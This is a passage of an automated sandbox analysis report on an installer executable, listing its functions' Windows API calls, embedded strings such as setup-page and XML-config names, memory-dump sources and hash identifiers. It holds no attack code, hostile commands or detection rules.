                                                                                                                                                                    • __EH_prolog3_catch.LIBCMT ref: 698F652C
                                                                                                                                                                      • Part of subcall function 698EE8E8: __EH_prolog3.LIBCMT ref: 698EE8EF
                                                                                                                                                                      • Part of subcall function 698EE93B: __EH_prolog3.LIBCMT ref: 698EE942
                                                                                                                                                                    • CoInitialize.OLE32(00000000), ref: 698F6596
                                                                                                                                                                      • Part of subcall function 698F697A: __EH_prolog3.LIBCMT ref: 698F6981
                                                                                                                                                                      • Part of subcall function 698F697A: CoCreateInstance.OLE32(698D7980,00000000,00000017,698D7970,?,?,00000068,698F65A6,?,?,?,?,698F2A30,?,00000000,?), ref: 698F69AC
                                                                                                                                                                    • CoCreateInstance.OLE32(698D7930,00000000,00000017,698D7970,00000001,?,?,?,?,698F2A30,?,00000000,?,00000000,00000000,?), ref: 698F65BE
                                                                                                                                                                    • CoUninitialize.OLE32(?,00000000,00000000,?,?,succeeded,?,?,?,698F2A30,?,00000000,?,00000000,00000000,?), ref: 698F66E1
                                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 698F6773
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4207541741.00000000698D1000.00000020.00000001.01000000.00000012.sdmp, Offset: 698D0000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4207446092.00000000698D0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207670274.000000006990F000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207744711.0000000069910000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207783387.0000000069912000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207825935.0000000069915000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_698d0000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3$CreateInstance$Exception@8H_prolog3_catchInitializeThrowUninitialize
                                                                                                                                                                    • String ID: exiting function/method$Entering Function$IronMan::UiDataT<class IronMan::CCmdLineSwitches>::CreateUiDataT$UIInfo.xml$Xml Document load failure$succeeded$threw exception
                                                                                                                                                                    • API String ID: 4239111664-3845428783
                                                                                                                                                                    • Opcode ID: df6b4478d643b0676342b4771d7353b0f6405b06a9ebc8dde895db549f1e94ea
                                                                                                                                                                    • Instruction ID: e2ba885d2bf4be97e49f2d3ba091770106ecde1fd3e3fcc5c01e2d4f2b22a0c7
                                                                                                                                                                    • Opcode Fuzzy Hash: df6b4478d643b0676342b4771d7353b0f6405b06a9ebc8dde895db549f1e94ea
                                                                                                                                                                    • Instruction Fuzzy Hash: 24815C7590024CEFDF00CFA8C848ADEBBB8AF59318F54995DE515EB251C735DA0ACBA0
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 698ED353 Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 163windowCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetParent.USER32(?), ref: 698ED38D
                                                                                                                                                                      • Part of subcall function 698DE153: GetWindowLongW.USER32(?,000000F0), ref: 698DE179
                                                                                                                                                                      • Part of subcall function 698DE153: GetParent.USER32 ref: 698DE18B
                                                                                                                                                                      • Part of subcall function 698DE153: GetWindowRect.USER32(?,?), ref: 698DE1A5
                                                                                                                                                                      • Part of subcall function 698DE153: GetWindowLongW.USER32(?,000000F0), ref: 698DE1BB
                                                                                                                                                                      • Part of subcall function 698DE153: MonitorFromWindow.USER32(?,00000002), ref: 698DE1DA
                                                                                                                                                                    • SetWindowTextW.USER32(?,?), ref: 698ED3A3
                                                                                                                                                                      • Part of subcall function 698ED149: __EH_prolog3.LIBCMT ref: 698ED150
                                                                                                                                                                      • Part of subcall function 698ED149: LoadImageW.USER32(00000000,?,00000001,00000020,00000020,00000010), ref: 698ED198
                                                                                                                                                                      • Part of subcall function 698ED149: SendMessageW.USER32(?,00000080,00000001,00000000), ref: 698ED1AF
                                                                                                                                                                      • Part of subcall function 698ED149: LoadImageW.USER32(00000000,?,00000001,00000020,00000020,00000010), ref: 698ED1E4
                                                                                                                                                                      • Part of subcall function 698ED149: GetDlgItem.USER32(?,00000068), ref: 698ED1F5
                                                                                                                                                                      • Part of subcall function 698ED149: SendMessageW.USER32(00000000,00000170,?,00000000), ref: 698ED209
                                                                                                                                                                      • Part of subcall function 698ED149: LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 698ED231
                                                                                                                                                                      • Part of subcall function 698ED149: GetDlgItem.USER32(?,00000069), ref: 698ED242
                                                                                                                                                                      • Part of subcall function 698ED149: SendMessageW.USER32(00000000,000000F7,00000001,?), ref: 698ED256
                                                                                                                                                                      • Part of subcall function 698ED149: LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 698ED27E
                                                                                                                                                                      • Part of subcall function 698ED073: __EH_prolog3.LIBCMT ref: 698ED07A
                                                                                                                                                                      • Part of subcall function 698ED073: SetDlgItemTextW.USER32(?,00000065,?), ref: 698ED130
                                                                                                                                                                    • GetDlgItem.USER32(?,00000066), ref: 698ED3B9
                                                                                                                                                                      • Part of subcall function 698E0B11: SetWindowLongW.USER32(?,000000FC,?), ref: 698E0B2D
                                                                                                                                                                    • SendMessageW.USER32(?,00000445,00000000,04000000), ref: 698ED3E4
                                                                                                                                                                      • Part of subcall function 698ED86C: _memset.LIBCMT ref: 698ED8B6
                                                                                                                                                                      • Part of subcall function 698ED86C: SendMessageW.USER32(?,0000043A,00000001,?), ref: 698ED8D9
                                                                                                                                                                    • SendMessageW.USER32(?,000000CF,00000001,00000000), ref: 698ED3FC
                                                                                                                                                                      • Part of subcall function 698ECFA5: __EH_prolog3.LIBCMT ref: 698ECFAC
                                                                                                                                                                      • Part of subcall function 698ECFA5: GetDlgItem.USER32(?,00000067), ref: 698ED018
                                                                                                                                                                      • Part of subcall function 698ECFA5: SetWindowLongW.USER32(?,000000FC,?), ref: 698ED041
                                                                                                                                                                      • Part of subcall function 698ECFA5: SetDlgItemTextW.USER32(?,00000067,?), ref: 698ED05A
                                                                                                                                                                      • Part of subcall function 698ED2BF: __EH_prolog3.LIBCMT ref: 698ED2C6
                                                                                                                                                                      • Part of subcall function 698ED2BF: SetDlgItemTextW.USER32(?,0000000B,00000000), ref: 698ED2FC
                                                                                                                                                                      • Part of subcall function 698ED2BF: SetDlgItemTextW.USER32(?,00000008,00000000), ref: 698ED33B
                                                                                                                                                                    • GetDlgItem.USER32(?,0000000B), ref: 698ED424
                                                                                                                                                                    • KiUserCallbackDispatcher.NTDLL(00000000,00000000), ref: 698ED42D
                                                                                                                                                                    • GetDlgItem.USER32(?,00000069), ref: 698ED482
                                                                                                                                                                    • GetDlgItem.USER32(?,0000006A), ref: 698ED4D5
                                                                                                                                                                    • PostMessageW.USER32(?,000006F5,00000000,00000000), ref: 698ED53E
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4207541741.00000000698D1000.00000020.00000001.01000000.00000012.sdmp, Offset: 698D0000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4207446092.00000000698D0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207670274.000000006990F000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207744711.0000000069910000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207783387.0000000069912000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207825935.0000000069915000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_698d0000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Item$MessageWindow$Send$Text$H_prolog3ImageLoadLong$Parent$CallbackDispatcherFromMonitorPostRectUser_memset
                                                                                                                                                                    • String ID: IDS_PRINT$IDS_SAVE
                                                                                                                                                                    • API String ID: 3208048787-3437764585
                                                                                                                                                                    • Opcode ID: 6c2b1860690df5719d608f11825f282beadcc28a902c5fb102a375570f6056f5
                                                                                                                                                                    • Instruction ID: 06bbcd8b911a2088699b477e4ef5c52e33965d044a592e755ef0ed984e2c1420
                                                                                                                                                                    • Opcode Fuzzy Hash: 6c2b1860690df5719d608f11825f282beadcc28a902c5fb102a375570f6056f5
                                                                                                                                                                    • Instruction Fuzzy Hash: 75517A75604345AFDB10DF68C884B1ABBE5FF8A718F004A2DF5559B2A0CB75E818CB52
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69D7787B Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 96registryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 69D77882
                                                                                                                                                                    • RegOpenKeyExW.KERNEL32(80000002,Software\Microsoft\PCHealth\ErrorReporting\DW\Installed,00000000,00020019,?,00000014,69D7781A,?,69DA831D,00000000), ref: 69D778B2
                                                                                                                                                                    • RegQueryValueExW.ADVAPI32(?,DW0200,00000000,00000000,?,?,?,69DA831D,00000000), ref: 69D778D8
                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,69DA831D,00000000), ref: 69D778E4
                                                                                                                                                                    • GetFileAttributesW.KERNEL32(?,?,69DA831D,00000000), ref: 69D778F9
                                                                                                                                                                    • SHGetFolderPathW.SHELL32(00000000,0000002B,00000000,00000000,?,?,69DA831D,00000000), ref: 69D7790E
                                                                                                                                                                    • GetFileAttributesW.KERNEL32(?,?,69DA831D,00000000), ref: 69D77931
                                                                                                                                                                    • GetFileAttributesW.KERNEL32(?,?,69DA831D,00000000), ref: 69D7798A
                                                                                                                                                                    Strings
                                                                                                                                                                    • DW0200, xrefs: 69D778C9
                                                                                                                                                                    • DW\DW20.exe, xrefs: 69D7795E
                                                                                                                                                                    • \Microsoft Shared\DW\DW20.exe, xrefs: 69D7791D
                                                                                                                                                                    • Software\Microsoft\PCHealth\ErrorReporting\DW\Installed, xrefs: 69D778A8
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AttributesFile$CloseFolderH_prolog3OpenPathQueryValue
                                                                                                                                                                    • String ID: DW0200$DW\DW20.exe$Software\Microsoft\PCHealth\ErrorReporting\DW\Installed$\Microsoft Shared\DW\DW20.exe
                                                                                                                                                                    • API String ID: 2337823764-2373061612
                                                                                                                                                                    • Opcode ID: 03fbdc5013002e86928adae0e682aa1aec47daabe894417c22c05eea257b1241
                                                                                                                                                                    • Instruction ID: f229d393f4b54c2049eb14fe461f576dd3bc147818370311665eca68e61e07b6
                                                                                                                                                                    • Opcode Fuzzy Hash: 03fbdc5013002e86928adae0e682aa1aec47daabe894417c22c05eea257b1241
                                                                                                                                                                    • Instruction Fuzzy Hash: FE3180B490024AEFEF11CFA4CC85ABFBAB9FF15319F504538E524E6690D7348915CBA1
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69D9182B Relevance: 19.7, APIs: 1, Strings: 10, Instructions: 448COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 69D91832
                                                                                                                                                                      • Part of subcall function 69DA833E: __EH_prolog3.LIBCMT ref: 69DA8345
                                                                                                                                                                      • Part of subcall function 69D79703: __EH_prolog3.LIBCMT ref: 69D7970A
                                                                                                                                                                      • Part of subcall function 69D79703: VariantInit.OLEAUT32(?), ref: 69D7971B
                                                                                                                                                                      • Part of subcall function 69D79703: SysFreeString.OLEAUT32(69D6A794), ref: 69D79751
                                                                                                                                                                      • Part of subcall function 69D79703: VariantClear.OLEAUT32(?), ref: 69D7978E
                                                                                                                                                                      • Part of subcall function 69D78F47: __EH_prolog3.LIBCMT ref: 69D78F4E
                                                                                                                                                                      • Part of subcall function 69D78F47: SysFreeString.OLEAUT32(?), ref: 69D78F98
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3$FreeStringVariant$ClearInit
                                                                                                                                                                    • String ID: For upgradecode %s, [%d] related products were found.$ProductCode$RelatedProducts item %s has %d related products.$Relation$SkipProduct$UpgradeCode$VersionMax$VersionMaxInclusive$VersionMin$VersionMinInclusive
                                                                                                                                                                    • API String ID: 2081811287-792701010
                                                                                                                                                                    • Opcode ID: c088ec63df55771b35d11ad54be74cc990bb9ccdaead88b3991ff2564cfe25ce
                                                                                                                                                                    • Instruction ID: eede964bba662dd459da339b37f393cdf4d16e75d89be484390f0c80810b01c3
                                                                                                                                                                    • Opcode Fuzzy Hash: c088ec63df55771b35d11ad54be74cc990bb9ccdaead88b3991ff2564cfe25ce
                                                                                                                                                                    • Instruction Fuzzy Hash: E6024AB5D00259EFCB01DFE8C984AADBBB9BF09318F148569F015EB751C734AA05CBA1
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 698DD923 Relevance: 19.5, APIs: 9, Strings: 2, Instructions: 228memoryfileCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 698DD92A
                                                                                                                                                                      • Part of subcall function 698EE8E8: __EH_prolog3.LIBCMT ref: 698EE8EF
                                                                                                                                                                    • PathIsRelativeW.SHLWAPI(00000000,00000000,?,00000000,00000008,698EE271,00000000,?,?,00000DF0,?,?), ref: 698DD960
                                                                                                                                                                    • GetModuleFileNameW.KERNEL32(00000010,00000104,?,00000000,00000008,698EE271,00000000,?,?,00000DF0,?,?), ref: 698DD9BA
                                                                                                                                                                    • PathCombineW.SHLWAPI(?,?,?,00000000,?,00000000,00000008,698EE271,00000000,?,?,00000DF0,?,?), ref: 698DDA0D
                                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 698DDAAF
                                                                                                                                                                    • SetFilePointer.KERNEL32(?,00000000,00000000,00000001,?,00000000,00000000,00000002,?,80000000,00000001,00000003,00000080,00000000,00000000), ref: 698DDAD0
                                                                                                                                                                    • SysAllocStringLen.OLEAUT32(00000000,?), ref: 698DDB07
                                                                                                                                                                    • ReadFile.KERNEL32(?,?,?,?,00000000,?,00000000,00000008,698EE271,00000000,?,?,00000DF0,?,?), ref: 698DDB38
                                                                                                                                                                    • FindCloseChangeNotification.KERNEL32(?,?,00000000,00000008,698EE271,00000000,?,?,00000DF0,?,?), ref: 698DDBB5
                                                                                                                                                                    Strings
                                                                                                                                                                    • Could not find mandatory data file %s. This is a bad package., xrefs: 698DDB6E
                                                                                                                                                                    • ReadXML failed to open XML file %s, with error %d, xrefs: 698DDA8B
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4207541741.00000000698D1000.00000020.00000001.01000000.00000012.sdmp, Offset: 698D0000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4207446092.00000000698D0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207670274.000000006990F000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207744711.0000000069910000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207783387.0000000069912000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207825935.0000000069915000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_698d0000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: File$H_prolog3Path$AllocChangeCloseCombineException@8FindModuleNameNotificationPointerReadRelativeStringThrow
                                                                                                                                                                    • String ID: Could not find mandatory data file %s. This is a bad package.$ReadXML failed to open XML file %s, with error %d
                                                                                                                                                                    • API String ID: 1788304661-4172873023
                                                                                                                                                                    • Opcode ID: 88d0250f6bc175a20687afae8a4cee73c27f8615db438af629a6f5c5a1f9c949
                                                                                                                                                                    • Instruction ID: 27bb53c2f10e83a0c7b50bb29971482f441346174a6af2e6abe7c24467d9476d
                                                                                                                                                                    • Opcode Fuzzy Hash: 88d0250f6bc175a20687afae8a4cee73c27f8615db438af629a6f5c5a1f9c949
                                                                                                                                                                    • Instruction Fuzzy Hash: B4916B75900219EFDF00CFA8C8849DEBBB9FF59318F109919E511B7290D734AA0ACFA0
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69D85396 Relevance: 19.5, APIs: 5, Strings: 6, Instructions: 227memoryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 69D8539D
                                                                                                                                                                    • SysFreeString.OLEAUT32(?), ref: 69D85420
                                                                                                                                                                    • SysAllocString.OLEAUT32(69DAFA6E), ref: 69D85490
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 69D854B8
                                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 69D85540
                                                                                                                                                                      • Part of subcall function 69D78415: __EH_prolog3.LIBCMT ref: 69D7841C
                                                                                                                                                                      • Part of subcall function 69D7A378: __EH_prolog3.LIBCMT ref: 69D7A37F
                                                                                                                                                                    Strings
                                                                                                                                                                    • //Setup/LocalizedData/Language, xrefs: 69D853CC
                                                                                                                                                                    • W, xrefs: 69D85530
                                                                                                                                                                    • Schema validation failure in file , xrefs: 69D85575
                                                                                                                                                                    • Unable to find Language element for LangID="%d" in localized data, xrefs: 69D8551A
                                                                                                                                                                    • \LocalizedData.xml: should have atleast one 'Language' child element!, xrefs: 69D85599
                                                                                                                                                                    • ParameterInfo.xml, xrefs: 69D85565
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3$String$AllocException@8FreeThrow
                                                                                                                                                                    • String ID: //Setup/LocalizedData/Language$ParameterInfo.xml$Schema validation failure in file $Unable to find Language element for LangID="%d" in localized data$W$\LocalizedData.xml: should have atleast one 'Language' child element!
                                                                                                                                                                    • API String ID: 191698298-1863159554
                                                                                                                                                                    • Opcode ID: 5ac2130d1ed9a2f30164cb6f35e968fad5eb747168cffe140a04d10886f27d5b
                                                                                                                                                                    • Instruction ID: 7c21fffe0a8c22a10fb6a66774342f3059177a2ef495040fdbf35220b95622d7
                                                                                                                                                                    • Opcode Fuzzy Hash: 5ac2130d1ed9a2f30164cb6f35e968fad5eb747168cffe140a04d10886f27d5b
                                                                                                                                                                    • Instruction Fuzzy Hash: 9A917E75900249EFDF00DFE8C984AEDBBB9BF19318F5481A8E515EB681C734DA05CB61
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69D9473C Relevance: 19.5, APIs: 7, Strings: 4, Instructions: 210commemoryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3_catch.LIBCMT ref: 69D94746
                                                                                                                                                                      • Part of subcall function 69DA833E: __EH_prolog3.LIBCMT ref: 69DA8345
                                                                                                                                                                      • Part of subcall function 69DA8380: __EH_prolog3.LIBCMT ref: 69DA8387
                                                                                                                                                                      • Part of subcall function 69D7388B: __EH_prolog3.LIBCMT ref: 69D73892
                                                                                                                                                                      • Part of subcall function 69D94464: __EH_prolog3.LIBCMT ref: 69D9446B
                                                                                                                                                                      • Part of subcall function 69D94682: __EH_prolog3.LIBCMT ref: 69D94689
                                                                                                                                                                    • CoInitialize.OLE32(00000000), ref: 69D947F7
                                                                                                                                                                    • CoCreateInstance.OLE32(69D6A974,00000000,00000017,69D6A9A4,?,?,?,?,?,69D73864,?,00000000,00000000,69DAFA6E,00000738,IronMan::EngineData::CreateEngineData), ref: 69D94815
                                                                                                                                                                      • Part of subcall function 69DB9D05: GetCommandLineW.KERNEL32(F0D05EFD,?,00000000,ParameterInfo.xml,?,?,?,00000000,?,?,?,?,ParameterInfo.xml,?,00000000,?), ref: 69DB9D54
                                                                                                                                                                    • CoUninitialize.OLE32(?,02602230,00000000,?,?,succeeded,69D6A794,?,?,?,?,69D73864,?,00000000,00000000,69DAFA6E), ref: 69D948ED
                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 69D948F9
                                                                                                                                                                    • SysAllocString.OLEAUT32(?), ref: 69D9492E
                                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 69D949BE
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3$String$AllocCommandCreateException@8FreeH_prolog3_catchInitializeInstanceLineThrowUninitialize
                                                                                                                                                                    • String ID: IronMan::EngineData::CreateEngineData$ParameterInfo.xml$succeeded$threw exception
                                                                                                                                                                    • API String ID: 1482071144-3644667230
                                                                                                                                                                    • Opcode ID: 4b0e687a8cb53f73105b4093385e1c605a6ec2e3f0ea882944832f5a9c370b88
                                                                                                                                                                    • Instruction ID: e8b5b8119036d76299bd794b537badfac7404caaef0b2372f8b5d2e9eb01a6ac
                                                                                                                                                                    • Opcode Fuzzy Hash: 4b0e687a8cb53f73105b4093385e1c605a6ec2e3f0ea882944832f5a9c370b88
                                                                                                                                                                    • Instruction Fuzzy Hash: A3816AB4900259EFCF00DFE8C988ADE7BB9AF09318F108569F525EB641C775DA05CBA1
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 698F6EE2 Relevance: 17.9, APIs: 1, Strings: 9, Instructions: 369COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 698F6EE9
                                                                                                                                                                      • Part of subcall function 698EE8E8: __EH_prolog3.LIBCMT ref: 698EE8EF
                                                                                                                                                                      • Part of subcall function 698E31A0: __EH_prolog3.LIBCMT ref: 698E31A7
                                                                                                                                                                      • Part of subcall function 698E31A0: _wcschr.LIBCMT ref: 698E31E8
                                                                                                                                                                      • Part of subcall function 698E31A0: __CxxThrowException@8.LIBCMT ref: 698E32A2
                                                                                                                                                                      • Part of subcall function 698E31A0: PathIsRelativeW.SHLWAPI(00000000,?,00000000,00000028,698F6F33,?,?,00000000,00000044,698F668B,?,00000000,00000000,?,?,succeeded), ref: 698E32B9
                                                                                                                                                                      • Part of subcall function 698E31A0: PathFileExistsW.SHLWAPI(00000000,?,?,?,698F2A30,?,00000000,?,00000000,00000000,?,?,00000000,00000008,698EE271,00000000), ref: 698E32C6
                                                                                                                                                                      • Part of subcall function 698E45DE: __EH_prolog3.LIBCMT ref: 698E45E5
                                                                                                                                                                      • Part of subcall function 698E60C9: __EH_prolog3.LIBCMT ref: 698E60D0
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4207541741.00000000698D1000.00000020.00000001.01000000.00000012.sdmp, Offset: 698D0000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4207446092.00000000698D0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207670274.000000006990F000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207744711.0000000069910000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207783387.0000000069912000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207825935.0000000069915000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_698d0000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3$Path$Exception@8ExistsFileRelativeThrow_wcschr
                                                                                                                                                                    • String ID: ?$EulaPage$FinishPage$MaintenanceModePage$ProgressPage$ResourceDll$SystemRequirementsPage$WelcomePage$Windows
                                                                                                                                                                    • API String ID: 1182493169-944454811
                                                                                                                                                                    • Opcode ID: be1c32e9a8f665a7942623eb0cc928a5e4fdafb9b826e1f8fd4667a55321e25d
                                                                                                                                                                    • Instruction ID: 0eea22727a6debc8fc45688ec650fc8ad338e6507bb1d8e300de4af6535c5082
                                                                                                                                                                    • Opcode Fuzzy Hash: be1c32e9a8f665a7942623eb0cc928a5e4fdafb9b826e1f8fd4667a55321e25d
                                                                                                                                                                    • Instruction Fuzzy Hash: D4F17C7190014DEFDF01CBE8C944BEEBBB8AF19318F14985DE155E7281DB349A0ADB21
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69D8E30E Relevance: 17.9, APIs: 2, Strings: 8, Instructions: 365COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 69D8E315
                                                                                                                                                                      • Part of subcall function 69DA833E: __EH_prolog3.LIBCMT ref: 69DA8345
                                                                                                                                                                      • Part of subcall function 69D78415: __EH_prolog3.LIBCMT ref: 69D7841C
                                                                                                                                                                      • Part of subcall function 69D7A378: __EH_prolog3.LIBCMT ref: 69D7A37F
